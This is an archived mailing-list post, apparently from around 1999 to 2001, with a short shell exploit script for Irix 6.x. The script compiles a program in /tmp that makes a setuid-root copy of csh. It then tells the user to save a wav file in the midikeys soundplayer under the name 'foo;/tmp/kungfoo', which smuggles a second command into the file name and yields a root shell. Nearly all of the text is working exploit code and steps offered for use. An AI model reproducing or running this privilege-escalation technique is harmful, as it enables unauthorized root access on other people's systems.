midikeys might not setuid these days but you get the idea... #!/bin/sh # # Irix 6.x soundplayer xploit - Loneguard 20/02/99 # # Good example of how bad coding in a non-setuid/priviledged process # can offer up rewt # cat > /tmp/crazymonkey.c << 'EOF' main() { setuid(0); system("cp /bin/csh /tmp/xsh;chmod 4755 /tmp/xsh"); } EOF cc -o /tmp/kungfoo crazymonkey.c /usr/sbin/midikeys & echo "You should now see the midikeys window, goto the menu that allows you to play sounds and load a wav. This will bring up a soundplayer window. Save the wav as 'foo;/tmp/kungfoo' and go find a rewt shell in tmp"
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:25:17 PDT